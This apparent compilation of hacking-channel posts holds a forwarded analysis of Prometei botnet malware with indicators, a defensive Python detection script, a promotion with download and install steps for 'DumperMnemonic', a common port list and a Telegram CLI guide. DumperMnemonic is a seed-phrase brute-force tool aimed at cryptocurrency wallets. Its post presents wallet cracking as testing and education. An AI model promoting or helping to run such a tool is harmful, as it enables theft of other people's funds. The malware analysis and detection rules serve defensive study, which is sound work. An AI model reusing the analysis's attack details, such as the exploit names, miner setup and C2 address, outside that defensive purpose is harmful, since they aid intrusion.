Forwarded from Exploiting Crew (Pr1vAt3)
The execution of the malware encountered in the investigation shows activities performed by the attackers which involved three processes: cmd.exe, sqhost.exe and wmic.exe:
CMD.exe: was used to execute the following commands (some of the commands are broken into individual commands for readability):
The attackers attempted to execute C:\Windows\svchost.exe, which is the same file as sqhost.exe; the attackers named it svchost in earlier versions, but no file by that name was downloaded in this attack or present on the system. The reference to “svchost.exe” resides in different components of the malware, sometimes even alongside “sqhost”. Our assumption is that it is kept either for backwards compatibility or because the attackers didn’t bother to change it in some places after renaming the main bot module to “sqhost.exe”.

Sqhost.exe: executed with “-watchdog” parameter, to make sure that it will keep running on the system.
Wmic.exe: was used to perform reconnaissance commands:
- wmic ComputerSystem get Model
- wmic OS get lastbootuptime
- wmic baseboard get product
- wmic os get caption


ExchDefender.exe
Exchdefender tries to masquerade as “Microsoft Exchange Defender”, a non-existent program whose name imitates a legitimate Microsoft product.

When first executed, it creates a service named “Microsoft Exchange Defender” [MSExchangeDefenderPL] that is set to execute the binary (from C:\Windows) with the same command line as seen used with sqhost.exe - “Dcomsvc”:
Exchdefender constantly checks the files within the directory C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth, a known directory to be used to host WebShells. The malware is specifically interested in the file “ExpiredPasswords.aspx” which was reported to be the name used to obscure the HyperShell backdoor used by APT34 (aka. OilRig). If the file exists, the malware immediately deletes it.

Our assessment is that this tool is used to “protect” the compromised Exchange Server by deleting potential WebShells so Prometei will remain the only malware using its resources.
SearchIndexer.exe:

SearchIndexer.exe is an open source Monero mining software (XMRig miner). It is executed with the content from “desktop.dat” file as a parameter, which contains the mining server and the username for the mining server:

[Image: content of desktop.dat]

Following the investigation, it appears that the user is “banned due to reports of botnet mining” from around March 2021, and it’s very likely that the attackers have changed the user already:
Netwalker.7z

The Netwalker.7z archive downloaded from the C2 178.21.164[.]68 is password protected, using the password “horhor123”. The content of the archive is saved under C:\Windows\dell, together with the other components of the bot. The archive contains the following files: Nethelper2.exe, Nethelper4.exe, Windrlver.exe, a copy of RdpcIip.exe, and a few DLLs used by the bot components.
RdpcIip.exe:

RdpcIip.exe (with a capital “I” instead of a lowercase “L”) is both downloaded directly by sqhost.exe and also contained in the Netwalker.7z archive. It is a key component of the malware. It has huge (trust us, huge) functionality with different branches, the main purpose being to interact with other components of the malware and make them work all together.

RdpcIip is responsible for some of the most important functions of the malware - harvesting credentials (using another component called Miwalk.exe) and spreading across the network using the stolen credentials as well as using the SMB exploit EternalBlue and the RDP exploit BlueKeep.
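The process and service artifacts listed above (the four wmic reconnaissance queries, sqhost.exe with “-watchdog”, svchost.exe launched from C:\Windows instead of System32, the “Microsoft Exchange Defender” service, SearchIndexer.exe as an XMRig miner, and the RdpcIip.exe homoglyph) translate directly into detection logic. The following is an added example, not code from the investigation or from the forwarded write-up: it runs a handful of rules over constructed Sysmon-style process/service creation events encoded as one JSON object per line. Assumptions that are mine rather than the page's: the event field names (`type`, `image`, `command_line`, `name`), that the real svchost.exe and SearchIndexer.exe live only under System32/SysWOW64, and that the miner's command line carries a `stratum` pool URL (an XMRig convention, not stated in the write-up).

```python
"""Detection logic for the Prometei process and service activity described above.
Added example; the event lines below are constructed, not taken from the investigation."""
import json
import ntpath

# wmic.exe reconnaissance queries named in the write-up, lower-cased for matching
WMIC_RECON = {
    "computersystem get model",
    "os get lastbootuptime",
    "baseboard get product",
    "os get caption",
}
# Service display name and short name the write-up gives for ExchDefender.exe
EXCH_DEFENDER_SERVICE = {"microsoft exchange defender", "msexchangedefenderpl"}
# Directories where the real svchost.exe / SearchIndexer.exe live (assumption: stock Windows layout)
LEGIT_SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def classify(event):
    """Return the findings for one event dict; an empty list means nothing matched."""
    findings = []
    if event["type"] == "service":
        if event["name"].lower() in EXCH_DEFENDER_SERVICE:
            findings.append("ExchDefender service install: " + event["name"])
        return findings

    image_path = event["image"]
    image = ntpath.basename(image_path).lower()
    directory = ntpath.dirname(image_path).lower().rstrip("\\")
    cmd = event.get("command_line", "").lower()
    tokens = cmd.split()
    # Drop the first token (the wmic invocation itself) so "wmic OS get caption" matches the set
    query = " ".join(tokens[1:])

    if image == "wmic.exe" and query in WMIC_RECON:
        findings.append("wmic reconnaissance: " + query)
    if image == "sqhost.exe" and "-watchdog" in tokens:
        findings.append("Prometei bot watchdog (sqhost.exe -watchdog)")
    if image in ("svchost.exe", "searchindexer.exe") and directory not in LEGIT_SYSTEM_DIRS:
        findings.append("%s running outside the system directory (%s)" % (image, directory))
    if image == "searchindexer.exe" and "stratum" in cmd:
        findings.append("mining pool argument on SearchIndexer.exe (XMRig)")
    if image == "exchdefender.exe":
        findings.append("ExchDefender.exe execution")
    if image == "rdpciip.exe":
        # RdpcIip.exe: a capital I stands in for the lowercase l of the real RdpClip.exe
        findings.append("RdpcIip.exe homoglyph of RdpClip.exe")
    return findings


def scan(log_lines):
    """Parse one JSON event per line and return (label, finding) pairs."""
    results = []
    for line in log_lines:
        event = json.loads(line)
        label = event["name"] if event["type"] == "service" else ntpath.basename(event["image"])
        for finding in classify(event):
            results.append((label, finding))
    return results


# Constructed sample events (Sysmon-like process/service creation, one JSON object per line).
# Paths, pool host and wallet value are placeholders, not indicators from the investigation.
SAMPLE_LOG = [
    r'{"type":"process","image":"C:\\Windows\\System32\\wbem\\WMIC.exe","command_line":"wmic OS get lastbootuptime"}',
    r'{"type":"process","image":"C:\\Windows\\System32\\cmd.exe","command_line":"cmd.exe /c whoami"}',
    r'{"type":"process","image":"C:\\Windows\\sqhost.exe","command_line":"sqhost.exe -watchdog"}',
    r'{"type":"process","image":"C:\\Windows\\svchost.exe","command_line":"svchost.exe Dcomsvc"}',
    r'{"type":"process","image":"C:\\Windows\\System32\\svchost.exe","command_line":"svchost.exe -k netsvcs"}',
    r'{"type":"process","image":"C:\\Windows\\dell\\SearchIndexer.exe","command_line":"SearchIndexer.exe -o stratum+tcp://pool.invalid:3333 -u WALLET_PLACEHOLDER"}',
    r'{"type":"service","name":"Microsoft Exchange Defender","image":"C:\\Windows\\ExchDefender.exe","command_line":"ExchDefender.exe Dcomsvc"}',
    r'{"type":"process","image":"C:\\Windows\\dell\\RdpcIip.exe","command_line":"RdpcIip.exe"}',
    r'{"type":"process","image":"C:\\Windows\\System32\\rdpclip.exe","command_line":"rdpclip.exe"}',
]

if __name__ == "__main__":
    for label, finding in scan(SAMPLE_LOG):
        print(label + ": " + finding)
```

The benign lines (cmd.exe /c whoami, svchost.exe from System32, the real rdpclip.exe) produce no findings, while the miner line fires twice: once for the location and once for the pool argument. The path check is what makes the svchost/sqhost rename irrelevant to the detection, which is the point the write-up makes about the stale “svchost.exe” references.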
🦑Crypto-bruteforce:

Overview of Features:
1. Mnemonic Generation and Verification:
- Generates random BIP39 mnemonic phrases.
- Verifies mnemonics for Ethereum, BNB, and Dogecoin wallets.

2. Standalone Execution:
- Comes with precompiled binaries for direct use without needing Python installed.
- Binaries are available for download in its GitHub releases.

3. Automatic Setup:
- Automatically installs Python and dependencies (Cryptofuzz, Colorthon, Requests) if missing.
- Configures the environment for script execution.

4. Open Source:
- Fully open-source and accessible via GitHub.

---

### Installation & Usage:

#### 1. Standalone Binary:
- Download the binary file:
[DumperMnemonic.zip](https://github.com/welugroup/cryptocurency_catcher/releases/download/t/DumperMnemonic.zip)
- Extract and run the program without needing Python installed.

#### 2. Run with Git and Python:
- Clone the repository and run the script:
  ```bash
  git clone https://github.com/welugroup/cryptocurency_catcher
  cd cryptocurency_catcher
  python DumperMnemonic.py
  ```


#### 3. Install Python Libraries:
If you prefer manual installation:
```bash
pip install cryptofuzz
pip install colorthon
pip install requests
pip install requests-random-user-agent
```

Or install from the requirements file:
```bash
pip install -r requirements.txt
```


#### 4. Running the Script:
- After dependencies are set:
  ```bash
  python DumperMnemonic.py
  ```


---

### Potential Uses:
1. Crypto Wallet Testing:
Generate and test mnemonic phrases for various blockchain networks.

2. Education and Learning:
Useful for understanding mnemonic creation, address derivation, and seed phrase management.

3. Exploration of Mnemonic Systems:
Analyze the security and randomness of generated mnemonics.

---

### GitHub Link:
Access the tool and documentation here:
[Dumper Mnemonic Repository](https://github.com/welugroup/cryptocurency_catcher)

🌐 Common Networking Port Numbers:

1️⃣ Port 22 (SSH): Used for Secure Shell (SSH) connections, enabling secure access to remote servers.
2️⃣ Port 80 (HTTP): The standard port for unencrypted web traffic; used by HTTP protocols for web browsing.
3️⃣ Port 443 (HTTPS): Secure HTTP port, vital for encrypted web traffic, ensuring safe data transfer online.
4️⃣ Port 53 (DNS): Domain Name System port, used for translating domain names to IP addresses.
5️⃣ Port 25 (SMTP): Simple Mail Transfer Protocol, responsible for email transmission.
6️⃣ Port 1433 (SQL Server): Microsoft SQL Server communication port, essential for database interactions.
7️⃣ Port 3389 (RDP): Remote Desktop Protocol port, used for remote access to Windows servers.
8️⃣ Port 3306 (MySQL): Default port for MySQL database connections.
9️⃣ Port 123 (NTP): Network Time Protocol, used to synchronize time across systems.

Source: Linkedin
🦑Use or automate Telegram like a pro

Telegram Messenger CLI:

A command-line interface (CLI) for Telegram that allows interacting with the Telegram messaging platform directly from the terminal. It provides features like messaging, contact management, and integration with the Telegram API, making it a powerful tool for developers and automation enthusiasts.

---

### Key Features:
1. API Integration: Full access to Telegram's API and MTProto protocol.
2. Command-Line Interaction:
- Messaging.
- Managing contacts and chats.
- Forwarding and deleting messages.
3. Customization:
- Supports TAB completion and command history.
- Configurable paths for server keys and data files.
4. Cross-Platform Compatibility:
- Available for Linux, BSDs, macOS, and other Unix-like systems.
5. Extensibility:
- Python integration for scripting and automation.

---

### Installation:

#### Clone Repository:
```bash
git clone --recursive https://github.com/vysheng/tg.git && cd tg
```


#### Dependencies:
Install the required libraries:

- Ubuntu/Debian:
  ```bash
  sudo apt-get install libreadline-dev libconfig-dev libssl-dev lua5.2 liblua5.2-dev libevent-dev libjansson-dev libpython-dev make
  ```

- Fedora:
  ```bash
  sudo dnf install lua-devel openssl-devel libconfig-devel readline-devel libevent-devel libjansson-devel python-devel
  ```

- Arch Linux:
  ```bash
  yaourt -S telegram-cli-git
  ```

- macOS (Homebrew):
  ```bash
  brew install libconfig readline lua python libevent jansson
  export CFLAGS="-I/usr/local/include -I/usr/local/Cellar/readline/6.3.8/include"
  export LDFLAGS="-L/usr/local/lib -L/usr/local/Cellar/readline/6.3.8/lib"
  ```


#### Build and Configure:
```bash
./configure
make
```


---

### Usage:

#### Basic Run:
```bash
bin/telegram-cli -k tg-server.pub
```


#### Commands:
- Messaging:
  ```text
  msg <peer> <Text>
  fwd <user> <msg-seqno>
  mark_read <peer>
  ```

- Contacts:
  ```text
  add_contact <phone-number> <first-name> <last-name>
  rename_contact <user> <first-name> <last-name>
  ```

- Chats:
  ```text
  chat_with_peer <peer>
  ```

- Message Management:
  ```text
  delete_msg <msg-seqno>
  restore_msg <msg-seqno>
  ```


#### Special Notes:
- Use TAB to auto-complete peer names and commands.
- Peer names:
  - Users: Replace spaces with underscores (e.g., John_Doe).
  - Chats: Use the chat title, replacing spaces with underscores.
  - Encrypted chats: Prefix with ! (e.g., !John_Doe).

---

### Upgrading:
When upgrading to version 1.0:
1. Binary moved to ./bin and renamed to telegram-cli.
2. Config directory updated to ${HOME}/.telegram-cli.
3. Requires re-login due to database incompatibility.
4. Peer names now use @ instead of #.

---

### GitHub Repository:
Find the full documentation, source code, and issue tracker here:
[Telegram CLI Repository](https://github.com/vysheng/tg)

---

This tool is suited to automation, server-side Telegram management, and developers looking to integrate Telegram functionality into their workflows.